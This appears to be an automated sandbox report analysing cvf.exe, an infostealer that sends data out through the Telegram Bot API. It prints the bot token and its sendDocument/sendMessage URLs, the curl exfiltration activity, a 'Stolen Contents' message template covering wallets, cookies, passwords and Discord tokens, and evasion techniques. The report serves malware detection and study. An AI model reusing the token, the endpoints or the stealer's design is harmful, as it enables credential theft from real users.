Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (4 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll (3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll
Source: C:\Windows\SysWOW64\curl.exe | Queries volume information: C:\Users\user\Desktop\log.zip (2 times)
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BC971B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 0_2_00BC971B
Source: C:\Windows\SysWOW64\curl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (techniques with matching signatures; the number is the count of matched signatures)

Tactic | Technique (matched signatures)
Execution | Windows Management Instrumentation (2)
Persistence | DLL Side-Loading (1)
Privilege Escalation | Process Injection (11); DLL Side-Loading (1)
Defense Evasion | Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
Discovery | System Time Discovery (1); Security Software Discovery (31); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (53)
Collection | Archive Collected Data (1)
Command and Control | Web Service (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (3)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact | no matching signatures
Behavior Graph ID: 1636485 | Sample: cvf.exe | Start date: 12/03/2025 | Architecture: WINDOWS | Score: 72

Process tree from the behavior graph (DNS/IP contacts and triggered signatures in brackets):
- cvf.exe [Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Joe Sandbox ML detected suspicious sample; contacts api.telegram.org (Uses the Telegram API, likely for C&C communication) and resolver1.opendns.com]
  - conhost.exe
  - cvf.exe
    - cmd.exe [Uses nslookup.exe to query domains]
      - nslookup.exe [222.222.67.208.in-addr.arpa; myip.opendns.com]
      - 2 other processes
    - cmd.exe
      - nslookup.exe [222.222.67.208.in-addr.arpa; myip.opendns.com]
      - 2 other processes
    - cmd.exe
      - powershell.exe [Loading BitLocker PowerShell Module]
    - 6 other processes
      - curl.exe [api.telegram.org 149.154.167.220:443, source ports 49723 and 49726, TELEGRAMRU, United Kingdom; 127.0.0.1 unknown]
      - curl.exe
      - curl.exe
      - 3 other processes

Source | Detection | Scanner | Label
cvf.exe | 15% | Virustotal |
cvf.exe | 11% | ReversingLabs |
No Antivirus matches (repeated for four further scanner tables)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
myip.opendns.com | 54.38.153.202 | true | false | | high
resolver1.opendns.com | 208.67.222.222 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
222.222.67.208.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage | false | | high
Name (as found in memory; trailing characters are adjacent memory bytes) | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragEath | cvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageapi.telegram.o | curl.exe, 00000013.00000003.1277931569.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.1277913522.00000000031E8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t.me/fakecloudflareLog | cvf.exe | false | | high
https://api.telegram.org/bot | cvf.exe | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-Fd | curl.exe, 00000020.00000002.1443059234.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/botCaliforniaUnited | cvf.exe | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-47 | curl.exe, 0000001E.00000002.1414619345.00000000029B0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage-HContent-Type | curl.exe, 00000008.00000002.1184435257.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1217555905.0000000003630000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1245625646.0000000003070000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031D0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageF | curl.exe, 00000011.00000003.1245496882.0000000003080000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH | curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/botExecuting | cvf.exe | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH% | curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE | cvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t.me/fakecloudflare | cvf.exe, READ_ME.txt.2.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
                                          IP
                                          127.0.0.1
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1636485
                                          Start date and time:2025-03-12 20:14:01 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 29s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name:Run with higher sleep bypass
                                          Number of analysed new started processes analysed:36
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:cvf.exe
                                          Detection:MAL
                                          Classification:mal72.troj.evad.winEXE@47/13@9/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 14
                                          • Number of non-executed functions: 72
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 40.69.42.241, 52.165.164.15, 23.199.214.10
                                          • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger
149.154.167.220 | 4500149631.vbe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | WizClient.exe | malicious | XWorm
149.154.167.220 | 1.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | #U0420#U0430#U0442#U043a#U0430.exe | malicious | XWorm
149.154.167.220 | https://nr.chadwickbarros.cl/ | malicious | Unknown
149.154.167.220 | R9rwNLVzpr.exe | malicious | Phemedrone Stealer
149.154.167.220 | nobtpajdjthawd.exe | malicious | Keyzetsu Clipper
149.154.167.220 | KoaguarLoader.exe | malicious | Salat Stealer, XWorm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
resolver1.opendns.com | laHk5V2vfR.exe | malicious | BTC, Coinhive, LummaC Stealer, Sapphire, Xmrig | 208.67.222.222
resolver1.opendns.com | main_x86.dll | malicious | Unknown | 208.67.222.222
resolver1.opendns.com | main_x86.dll | malicious | Unknown | 208.67.222.222
resolver1.opendns.com | main_x86.dll | malicious | Unknown | 208.67.222.222
resolver1.opendns.com | main_x86.dll | malicious | Unknown | 208.67.222.222
resolver1.opendns.com | 36599208287637_182387937827.vbs | malicious | Gozi, Ursnif, Amadey | 208.67.222.222
resolver1.opendns.com | hkN23TcCdh.exe | malicious | Unknown | 208.67.222.222
resolver1.opendns.com | hkN23TcCdh.exe | malicious | Unknown | 208.67.222.222
resolver1.opendns.com | TS-240730-ShellCode3.exe | malicious | Unknown | 208.67.222.222
api.telegram.org | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | WizClient.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | 1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | #U0420#U0430#U0442#U043a#U0430.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | https://nr.chadwickbarros.cl/ | malicious | Unknown | 149.154.167.220
api.telegram.org | R9rwNLVzpr.exe | malicious | Phemedrone Stealer | 149.154.167.220
api.telegram.org | nobtpajdjthawd.exe | malicious | Keyzetsu Clipper | 149.154.167.220
api.telegram.org | KoaguarLoader.exe | malicious | Salat Stealer, XWorm | 149.154.167.220
myip.opendns.com | laHk5V2vfR.exe | malicious | BTC, Coinhive, LummaC Stealer, Sapphire, Xmrig | 54.38.153.202
myip.opendns.com | main_x86.dll | malicious | Unknown | 146.70.131.148
myip.opendns.com | main_x86.dll | malicious | Unknown | 146.70.131.148
myip.opendns.com | main_x86.dll | malicious | Unknown | 146.70.131.148
myip.opendns.com | main_x86.dll | malicious | Unknown | 146.70.131.148
myip.opendns.com | 36599208287637_182387937827.vbs | malicious | Gozi, Ursnif, Amadey | 146.70.131.148
myip.opendns.com | hkN23TcCdh.exe | malicious | Unknown | 54.38.153.202
myip.opendns.com | hkN23TcCdh.exe | malicious | Unknown | 54.38.153.202
myip.opendns.com | TS-240730-ShellCode3.exe | malicious | Unknown | 54.38.153.202
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | M1gP5m86Gn.exe | malicious | LummaC Stealer | 149.154.167.99
TELEGRAMRU | ca703fd579bbcee73544b9b37f8a6469.bin.exe | malicious | LummaC Stealer | 149.154.167.99
TELEGRAMRU | DEVM24-clean.exe | malicious | LummaC Stealer | 149.154.167.99
TELEGRAMRU | WizClient.exe | malicious | XWorm | 149.154.167.220
TELEGRAMRU | kumori.exe | malicious | LummaC Stealer | 149.154.167.99
TELEGRAMRU | ShadowLoader.exe | malicious | LummaC Stealer | 149.154.167.99
TELEGRAMRU | 1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | mal_temp.dotm.doc | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exe | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exe | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | 1.exe | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | Dropper.exe | malicious | AsyncRAT, Trap Stealer, XWorm | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | setup.exe | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | ggetokken.bat | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | hGlhyegaG6.exe | malicious | Unknown | 149.154.167.220
74954a0c86284d0d6e1c4efefe92b521 | 1.exe | malicious | Unknown | 149.154.167.220
                                                            No context
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1796
                                                            Entropy (8bit):5.447245395150842
                                                            Encrypted:false
                                                            SSDEEP:48:FWSU4y4RQmFoUeWmfmZ9tK8NWR8nNskB690hyNZ:FLHyIFKL3OZ2KWRShyb
                                                            MD5:2B8E5E7BC16181AF1F47A02EC0786578
                                                            SHA1:22F1C96CE323A819B18AA2A0F49B5253B52C3E5B
                                                            SHA-256:572E009458C144CD011873692CABBF20B492424D10F1FB94706B239FBE8CA52F
                                                            SHA-512:058245D0162E44B0DEDBE14D921184A6A46320F750895F03DD8B9583254AE661A6C99158FB682B2D6B337125028CD65382FBFC877CDF256974B7C71B9484FE65
                                                            Malicious:false
                                                            Preview:@...e...........Z...............................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\cvf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:modified
                                                            Size (bytes):11
                                                            Entropy (8bit):3.0957952550009344
                                                            Encrypted:false
                                                            SSDEEP:3:gXT:gj
                                                            MD5:824D5FECDCD6BAA546E3ABA166D9C08D
                                                            SHA1:E4ACDDB5C876E62B8FA33F70EDD4C78A94896DFE
                                                            SHA-256:F807A86E144CDF96128BEC05A9E10A034AC3C485761568C92A164F3C458B3720
                                                            SHA-512:2500F320331B760731DFEEB1E7E158C9782374222207DCD8EAF8C0FF210B8D9D2DC2F1F2D72EB3B813C368D961828D680C6E6B773C337A466E2890ED2B020A1B
                                                            Malicious:false
                                                            Preview:already run
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                            Category:dropped
                                                            Size (bytes):180
                                                            Entropy (8bit):4.86904349285852
                                                            Encrypted:false
                                                            SSDEEP:3:vhjzJ/5wlml/QoDVvG6AveMN2KT8xuylnlkkxxltJ/5wlml/vDZgB+lFlA/:5jl/5wcl/nDYbQoMltxxl/5wcl/vDZix
                                                            MD5:A0F45CEF081AD8A774CEAA5F0232680C
                                                            SHA1:6F64A9688D715B6CA198EB0374CD1739F8620F43
                                                            SHA-256:547CABBC46DA2BACE81DB027D76288A7B4361068AAE463F049BB029A75E30C98
                                                            SHA-512:26F41CFA178A6AED37DFE4FFAE60EFA131DD877F3A74E9AE68C65C2272A791C0FD93754F8B17B548DA8E48B4DA9BC3357A7FDB83BB9182EF7F10FF764A3DEA30
                                                            Malicious:false
                                                            Preview:PK.........ylZ.m.i<...:.......READ_ME.txts..+QH./JO-Q(.W(...,Q..LOOT...())(.../..M.OK.NM../MI.I,J....PK...........ylZ.m.i<...:.....................READ_ME.txtPK..........9...e.....
                                                            Process:C:\Users\user\Desktop\cvf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):58
                                                            Entropy (8bit):4.454085788830666
                                                            Encrypted:false
                                                            SSDEEP:3:6jEKMCCEEqWDbvjv:6jEKMCHEqWHjv
                                                            MD5:D14492639C5A06DA2E624090FDCE21BF
                                                            SHA1:BCBD5600F211BA6FC41681925801D9E5119B82D5
                                                            SHA-256:F365D57CC3E9DC4E9468D3296A98551C9FE685938B16707AA0B06070268EF70F
                                                            SHA-512:F89912924B038DED666B87D543E61319DD0085215B39C0571AA08021E1A817F9B902512E10CDB787AF0F6E948616ADB738EC8D284600009B8BBC57E6C120087A
                                                            Malicious:false
                                                            Preview:Dont forget to split nigga!..https://t.me/fakecloudflare..
                                                            Process:C:\Users\user\Desktop\cvf.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):388
                                                            Entropy (8bit):5.326653378682866
                                                            Encrypted:false
                                                            SSDEEP:12:YGGcGyoMMOOC4x7RjDTkpiSiWLx0xAvj0q:YJ5yoZ1Tb6x0x4l
                                                            MD5:9C352C3864FC84E05CED677C9180C976
                                                            SHA1:7B02B2CC31AC3D7CD47D1D6045310C92813FF2AF
                                                            SHA-256:57AAA39F5E50226A1A9853ED736036B192A5D6AA2CAB7D2BAF8503D04B1F29A9
                                                            SHA-512:AB231B580042BC8E19B0E88D6DC8232CDD1FCFA25333E4C9037C2A65174823954FAFC9574DDA43E3AFE9A1437A78D5FBB2FA78491F07DE096F45B13B58FB1C12
                                                            Malicious:false
                                                            Preview:{"chat_id": "", "parse_mode": "HTML", "text": ".. Stolen Contents ..\n\n.. IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n.. Wallet Extensions (0)\n\n.. Software Wallets (0)\n\n.. Cookies & Saved Passwords (0)\n... None (N/A)\n\n.. Telegram Sessions\n... 0 Session(s) Found\n\n.. Discord Tokens\n... 0 Account(s) Found\n\n.. Grabbed Files\n"}
                                                            Process:C:\Windows\SysWOW64\nslookup.exe
                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                            Category:dropped
                                                            Size (bytes):28
                                                            Entropy (8bit):4.039148671903071
                                                            Encrypted:false
                                                            SSDEEP:3:U+6QlBxAN:U+7BW
                                                            MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                            SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                            SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                            SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                            Malicious:false
                                                            Preview:Non-authoritative answer:...
                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.509613912012467
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:cvf.exe
                                                            File size:299'520 bytes
                                                            MD5:724d9557f66b00f2d74846e3e29434e6
                                                            SHA1:7edbf247b9cb9881c1888c4feaaee5fcb3af0254
                                                            SHA256:cc681954f48230c5a451104f96273baaab0d30d800732af5a1cf4e1eaf49d719
                                                            SHA512:63c14bda4fa40fa82ec0a1494dcfe98c719f745f9e1001ddd604eddc587eebce20b7611a68d08b8acd480bf3d8e50526b379df9bf1742fa8ca36f2bb1ecec0e0
                                                            SSDEEP:6144:UPEjjoaFQoVFUt4fg5Mdx2zJOuwUYpcNDpkhE:+EPnUt43wcomhE
                                                            TLSH:B8546C327380C071D4922173A66C9BA6977DB9304FA595CBABC44E3BDB607C1A631F1B
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Zj.e...6...6...6Us.7...6Us.7...6Us.7...6...7...6...7...6...7O..6Us.7...6...6c..6...7...6..#6...6...7...6Rich...6........PE..L..
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x418fbb
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67CFF95D [Tue Mar 11 08:50:37 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:b10c9f38e47184aaa7cab7f4bb83709e
Instruction
call 00007F15FCBEF79Dh
jmp 00007F15FCBEEE69h
push ebp
mov ebp, esp
and dword ptr [00448620h], 00000000h
sub esp, 24h
or dword ptr [004470C4h], 01h
push 0000000Ah
call dword ptr [0043A0A0h]
test eax, eax
je 00007F15FCBEF1A2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
nop
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
or eax, dword ptr [ebp-08h]
or eax, edi
mov dword ptr [ebx+04h], esi
mov dword ptr [ebx+08h], ecx
mov dword ptr [ebx+0Ch], edx
jne 00007F15FCBEF035h
mov eax, dword ptr [ebp-24h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007F15FCBEF015h
cmp eax, 00020660h
je 00007F15FCBEF00Eh
cmp eax, 00020670h
je 00007F15FCBEF007h
cmp eax, 00030650h
je 00007F15FCBEF000h
cmp eax, 00030660h
je 00007F15FCBEEFF9h
cmp eax, 00030670h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x45d78 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4b000 | 0x2650 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x42730 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x42670 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3a000 | 0x194 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
